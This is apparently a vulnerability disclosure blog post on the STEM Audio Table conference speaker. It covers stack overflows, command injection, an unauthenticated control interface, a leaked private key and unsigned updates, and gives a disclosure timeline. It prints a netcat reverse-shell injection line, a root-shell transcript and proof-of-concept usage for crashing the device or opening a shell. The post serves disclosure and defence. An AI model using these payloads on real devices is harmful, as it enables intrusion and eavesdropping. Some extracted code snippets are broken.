The walls have ears

Modern business often relies heavily on the Internet and software resources such as Zoom or Skype to support daily operations. Use of such systems often requires additional hardware resources like microphones and cameras. Advances in computing has provided a pathway for these very ordinary hardware commodities to develop into resources that enrich user experience through vast offerings of specialized features or the integration of many discrete devices into a single product. With this progress comes additional risk in product use, because what were once mechanical or analog devices are now increasingly being redesigned with embedded processors. This change in direction implies that what seem like ordinary commodity devices are, in fact, reasonably capable computing machines with attack surfaces very similar to traditional PCs.

GRIMM researchers recently selected one such device, the STEM Audio Table conference room speaker. This blog post details the results of that research, and provides a case study into some of the more common vulnerabilities found in these sorts of devices.  This includes unauthenticated remote code execution (RCE) as root, which would allow eavesdropping on conversations if a payload was written to do so.

All of the issues were reported to STEM and their parent company (Shure), and the security folks at Shure have said that the latest update (version fixes all of the reported issues. Automatic updates have been supported since firmware version 1.3, which was released in May of 2020.  If you have one of these devices, make sure it is getting the updates.

Bug identification

Stack Buffer Overflow

  • Location: local_server_get() and sip_config_get() in stem_firmware_linux_2.0.0.out
  • Affected Versions: 2.0.0 - 2.0.1 (latest at the time of research)
  • Impact: Arbitrary Remote Code Execution (RCE) as root
  • CVE Numbers: TBD,TBD

A stack-based buffer can be overrun with user-controlled data in the local_server_get function. This function is responsible for handling user requests to retrieve the “local server" device configuration option. This is done by first requesting that the device set this option to a user-controlled value, followed by an inquiry on what that value is. The storage container for this setting is much larger than the stack buffer size allotted for it while preparing the response packet that will be returned to the user. As such, the contents of the retrieved configuration value will spill onto the surrounding stack due to the use of sprintf to unsafely copy the data contents. Exploitation of this vulnerability could allow attackers to remotely execute arbitrary code as root on the device.

The same pattern used to trigger the buffer overflow of the “local server" setting can similarly be used to exercise a buffer overflow in the handlers responsible for getting and setting Session Initiation Protocol (SIP) configuration options. The function execution flow of sip_config_get is identical to local_server_get, and so the same exploitation pattern as described above can be used. The pattern of using sprintf or strcpy is used very often in this binary and, as such, likely provides many more buffer overflow opportunities.

Command Injection

  • Location: system_update_now() in stem_firmware_linux_2.0.0.out
  • Affected Versions: 2.0.0 - 2.0.1 (latest at the time of research)
  • Impact: Arbitrary RCE as root
  • CVE Number: TBD

The firmware update mechanism is handled by a Python support script that runs with user-supplied arguments. The system_update_now function handler is responsible for invoking this script as shown:

  sprintf(&command, "python /home/root/Scripts/
  %s %s %s &", url, user, password);

No sanitization is performed on these arguments (“url", “user", or “password") before invoking system to start the Python interpreter. The origin of these three parameters is the entirely user-controlled “local server" device configuration option. Exploitation of this vulnerability is shown to provide attackers the ability to execute arbitrary code as root on the device.

Other Miscellaneous Security Concerns

Control Interface Authentication

One of the most damaging findings was that the device was externally controllable with no authentication. The web-based Graphical User Interface (GUI) appeared to be the only mechanism that employed any form of credential enforcement. Authentication should never be a client-side operation, as seemed to be the intent with the STEM Audio Table. After understanding the command structure (see "Sending Commands to STEM Audio Table") it was observed that any operation the GUI was capable of, and more, could be remotely executed without knowing the organization password. Further, if the current password were desired, one need only ask with a special use of the STEM_ORG_LEAVE_REQ command. Altogether, the device can be completely controlled through this unauthenticated interface. A subset of available commands includes:

  • Enable SSH (requires user passwords to login)
  • Factory Reset
  • Get/Set Organization Password
  • Reboot
  • Set Update Server URL
  • Check For Updates

Breaking Encryption

During testing, it was observed that communication between the STEM Audio Table device and the web GUI used for configuration was occasionally encrypted. This encryption appeared to be used during particularly sensitive operations like setting user passwords or other types of credentials. However, the device’s employed logic does not enforce or require such encryption. The same commands can be sent in plaintext and the device will happily handle the request without objection.

Additionally, due to an oversight by developers, the private key associated with the encrypted data is freely available in the firmware update packages. In fact, it can even be downloaded directly from the device.

$ curl

Network traffic is easily decrypted after acquiring this private key.

Update process

While the update process was not researched in depth, it was clear that update packages are unsigned tarballs. At boot, the device checks for a previously downloaded tar file and, if present, extracts it to a fixed location on the filesystem and runs a hardcoded script from within.

The update process appeared to be authenticated with user-supplied credentials if configured to use a “local server" as the source of such updates. This configuration supports installation scenarios where the device is somehow firewalled, or otherwise isolated from, the Internet and so is unable to contact Stem Audio directly for update packages. However, the unauthenticated control interface described in the "Sending Commands to STEM Audio Table" section can be used to enable this update configuration and arbitrarily change the Uniform Resource Locator (URL) , username, and password used by the device while checking for updates. As such, an attacker might able to forge a legitimate update by creating a tarball conforming to an expected naming scheme, hosting it on a fake update server pointed to by the newly configured local-server URL, and forcing an update check (see the "Command Injection" section). In this way, the device would, through its ordinary update process, download an attacker-controlled tarball and execute attacker-controlled scripts from within, thereby achieving RCE.

Lack of User Isolation

All services on the STEM Audio Table were observed to be running as root. This implies that an exploited vulnerability in any component of the Stem device may ultimately provide execution in the context of the most privileged user on a Linux machine. A common technique not employed here is to make use of several non-root user accounts that only have access to resources strictly required for their operation, known as the Principle of Least Privilege. In cases where elevated privileges are needed, Interprocess Communication (IPC) to higher privileged services or use of Linux groups will often suffice.

Technical analysis

Software Architecture

Figure 1: Runtime software components of the STEM Audio Table device and their associated ports

The runtime software architecture of the STEM Audio Table device consists of a single userspace binary hosting a device control service (port 8899) alongside the typical SIP service (port 5060). The control service is routed through a Python WebSocket server that handles in-transit decryption and minor processing of select commands. A majority of commands are forwarded to the backend service provider as depicted in Figure 1.

Sending Commands to STEM Audio Table

The STEM Audio Table device is controllable from external endpoints through the control interface. While “control interface” is not an official term from the vendor, it will be used throughout this analysis to describe the interface through which the STEM Audio Table device can be externally controlled. The control interface listens on port 8899 for commands. The command structure is quite simple, and follows the form:


Where IP seems to either be the device IP or broadcast (e.g. address, COMMAND is the desired command, and ARGS are arguments to the command. It should be noted that the handlers generally expect the arguments to be strings, so including NUL-bytes may prematurely terminate your argument data when being copied around during processing.

Stack Buffer Overflows

The vulnerable functions are sip_config_get and local_server_get and exploitation could result in arbitrary code execution. The code below shows the decompiled logic of the local_server_get function.

int local_server_get(void)
          char buf[104];
          char *value;

          value = settings_get_value(0x14u);
          sprintf(buf, "STEM_LOCAL_SERVER_URL_GET_RSP:%s;", value);
          return udp_send_message(buf, STACK[0x450]);

To exercise the stack overflow one must first set the local server configuration setting and then get the same setting (see below). The data will be copied unbounded into the stack buffer variable buf. Because the STEM Audio Table device’s userspace binaries are not compiled as Position-Independent Executable (PIE), exploitation of this overflow can be used to trigger a Return-Oriented Programming (ROP) execution chain to have some useful effect, like spawning a reverse shell. Note that even userspace libraries dynamically loaded into the process have fixed base addresses, despite being compiled as shared objects that support Address Space Layout Randomization (ASLR).


The ARGS component (See "Sending Commands to STEM Audio Table") in the set command in the snippet above is shown with an ellipsis (“AAAAAA...”). In practice, the length of this data should be long enough to overflow buf and overwrite the return address stored on the stack. For version 2.0.1, this is greater than or equal to 78 bytes of data.

Note that when the backend service binary stem_firmware_linux_2.0.0.out exits, the system will trigger a reboot in approximately 15 seconds. As such, this vulnerability could additionally be used to crash the backend service process, which would cause the entire device to reboot. Repeating this process would result in a Denial of Service (DoS) attack that would render all local STEM Audio Table devices effectively useless.

The second exploitable stack buffer overflow is located in the sip_config_get function. The vulnerable code follows the same pattern as above (sprintf of user controlled data) and can be exploited in the same way.

Command Injection

The STEM Audio Table backend service makes extensive use of the system library call. Finding a command injection technique came down to finding cross-references to this library function and the STEM Audio Table code that used it. After a short time, the function system_update_now gave us a lead:

int system_update_now()
  int offset;
  char *value;
  char url[[];
  char user[];
  char pass[];
  char command[];

  if ( device_normal_op() )
    offset = 0;
    value = settings_get_value(0x14u);
    parse_until_delimiter(value, url, &offset, ";");
    parse_until_delimiter(value, user, &offset, ";");
    parse_until_delimiter(value, pass, &offset, ";");
    sprintf(&command, "python /home/root/Scripts/ %s %s %s &",
        url, user, pass);
    if ( system(&command) == -1 )
        handle_error(-250, "system/system.c", 0xEAu);

This function takes an arbitrary string from the configuration data and parses out three arguments: url, user, password. It then directly copies each of these into a composite buffer that is then passed to the system library call. If the contents of the 0x14 setting can be set to user-controlled data then we can achieve command injection, and subsequently RCE.

Indeed, arbitrary control of the 0x14 setting is possible. This unnamed settings was determined to be associated with the ”local server" configuration and can be set by sending the device the following command template:


The code responsible for handling user input does not implement sanitization, so user data is passed as-is into the configuration profile of the device. Later, when this user-supplied value is used in some way, it remains entirely user-controlled. If this user-controlled data is passed to a call to system directly, as the function system_update_now is shown above to do, then back-ticks may be used to spawn sub-shells to run arbitrary commands in the context of the backend service provider. For example, to reboot the device the appropriate setup command is:


Followed by a triggering command that forces the device down this vulnerable code path. It was determined that the vulnerable function was associated with a call tree that starts with the command handler for the following command:


If we first spawn a local listener (e.g. nc -lk $IP $PORT), a reverse shell is achievable by sending the following command as described above (followed by the triggering command):

mkfifio /tmp/a && cat /tmp/a | /bin/sh -i 2>&1 | nc $IP $PORT >/tmp/a

Note the use of && rather than a semi-colon as a shell command separator. Recall that the vulnerable code uses semi-colons as its own internal delimiters and, as such, cannot be used within an injected command. The effect of executing this command after starting the local listener is shown in the following listing:

$ nc -kl 5555
sh: cannot set terminal process group (217): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4# id
uid=0(root) gid=0(root)
sh-4.4# cat /proc/cpuinfo
processor       : 0
model name      : ARM926EJ-S rev 5 (v5l)
BogoMIPS        : 220.92
Features        : swp half thumb fastmult edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant     : 0x0
CPU part        : 0x926
CPU revision    : 5

Hardware        : Generic DA850/OMAP-L138/AM18x
Revision        : 0000
Serial          : 0000000000000000


A Python script,, is provided to interface with the STEM Audio Table device. This script can be used to validate two of the vulnerabilities outlined above: the local_server_get stack overflow and the command line injection. Additionally, this script provides functions for interfacing with the device in other ways as an unauthenticated user, including decrypting encrypted messages with the leaked private key, turning the device’s display lights on and off, and factory resetting the device.

To exercise the stack overflow and, as a result, observe a device reboot, the following command can be used where $STEM_IP is the IP address of the STEM Audio Table device:

python3 –ip $STEM_IP –func crash

Once the service crashes a hardcoded fifteen second timer begins, after which the device will begin to reboot itself. On boot the device will emit an audible chime. This will be observed roughly two minutes after the forced crash.

The second provided Proof of Concept (PoC) is for the reverse-shell as shown below. First, spawn a network listener using nc as shown in the same listing, followed by:

python3 –ip $STEM_IP –func reverse-shell –args $LOCAL_IP:$LOCAL_PORT

Where $LOCAL_IP and $LOCAL_PORT are the IP and port as specified in the local network listener. Additionally, the –func argument list can be used to see all supported commands and their descriptions.


Voice over Internet Protocol (VoIP) devices like the STEM Audio Table are essentially network-connected microphones. Their compromise, through the described RCE vulnerabilities, could allow attackers to passively eavesdrop on nearby conversations and quietly maintain network persistence. Such a foothold inside an organization provides a stable position for further network operations, data collection, and surveillance from a device that is unlikely to attract much attention. Without proper device isolation in the network, collected data can easily be exfiltrated over the Internet back to attackers.

Beyond the RCE vulnerabilities, the STEM Audio Table device contains numerous other, highly impactful vulnerabilities. Since the device exposes an unauthenticated control interface, network attackers can force the device to perform tasks such as providing device administrator passwords, rebooting the device, and even factory reseting it. Modifying the URL to the update server is another supported task, which would allow an unauthenticated attacker to point the device to a malicious update server. Since the device does not check the signatures of the update (which is just a tarball), an attacker could supply the device with an arbitrary update file.

Additionally, the STEM Audio Table device doesn’t enforce encryption on sensitive operations (e.g. setting user passwords) between the device and its frontend web GUI. Thus, the data exchanged during these operations (e.g. the transmission of credentials) can be read by attackers listening on the local network. Even if the use of encryption was enforced, the device leaks the private key that would be used to encrypt this data through its firmware update packages. Possession of this key would allow an attacker to decrypt the encrypted traffic between the device and web frontend.

While GRIMM did not analyze all services running on the STEM Audio Table device, it was noted that all of the observed services were running under the root user. The impact of this design decision is that any other exploitable vulnerabilities within these services could provide attackers with root privileges.


This blog post detailed a series of serious security vulnerabilities in the STEM Audio Table conferencing device. The exploitation of these vulnerabilities may allow attackers to passively monitor nearby conversations within an organization as well as offer techniques for achieving persistence within enterprise networks. While GRIMM’s research efforts targeted this particular device, the vulnerabilities and design flaws identified by GRIMM follow similar patterns to vulnerabilities discovered in other networked Video Teleconferencing (VTC) devices throughout the small commodity hardware industry. As such, similar issues are undoubtedly present in related devices such as VoIP phones, network-connected cameras, and many ”smart" devices that are part of the Internet of Things (IoT) space.

During product selection and procurement, organizations should take special care to conduct research, to the extent possible, on the security history of a particular product or company. This information comes in many forms, such as manufacturer-specific security advisories, public security advisories, or blog posts from security researchers that previously investigated the product.

Additionally, where possible, organizations should audit devices before deploying their use within company infrastructure. And even then, proper network isolation should be implemented. In this way, the scope of access to the vulnerable devices is limited and, as such, significantly mitigates the risk associated with device use.


  • 04/23/2021 - First attempt to Notify vendor (Stem Audio)
  • 04/28/2021 - Second attempt to notify vendor (Stem Audio)
  • 05/07/2021 - Notified parent company (Shure)
  • 06/08/2021 - Final patch released by Stem Audio
  • 06/08/2021 - NotQuite0DayFriday release
  • 06/08/2021 - Blog post release

GRIMM’s Private Vulnerability Disclosure (PVD) program

GRIMM’s Private Vulnerability Disclosure (PVD) program is a subscription-based vulnerability intelligence feed. This high-impact feed serves as a direct pipeline from GRIMM’s vulnerability researchers to its subscribers, facilitating the delivery of actionable intelligence on 0-day threats as they are discovered by GRIMM. We created the PVD program to allow defenders to get ahead of the curve, rather than always having to react to events outside of their control.

The goal of this program is to provide value to subscribers in the following forms:

  • Advanced notice (at least two weeks) of 0-days prior to public disclosure. This affords subscribers time to get mitigations in place before the information is publicly available.
  • In-depth, technical documentation of each vulnerability.
  • PoC vulnerability exploitation code for:
    • Verifying specific configurations are vulnerable
    • Testing defenses to determine their effectiveness in practice
    • Training
      • Blue teams on writing robust mitigations and detections
      • Red teams on the art of exploitation
  • A list of any indicators of compromise
  • A list of actionable mitigations that can be put in place to reduce the risk associated with each vulnerability.

The research is done entirely by GRIMM, and the software and hardware selected by us is based on extensive threat modeling and our team’s deep background in reverse engineering and vulnerability research. Requests to look into specific software or hardware are welcome, however we can not guarantee the priority of such requests. In addition to publishing our research to subscribers, GRIMM also privately discloses each vulnerability to its corresponding vendor(s) in an effort to help patch the underlying issues.

If interested in getting more information about the PVD program, reach out to us.

Working with GRIMM

Want to join us and perform more analyses like this? We’re hiring. Need help finding or analyzing your bugs? Feel free to contact us.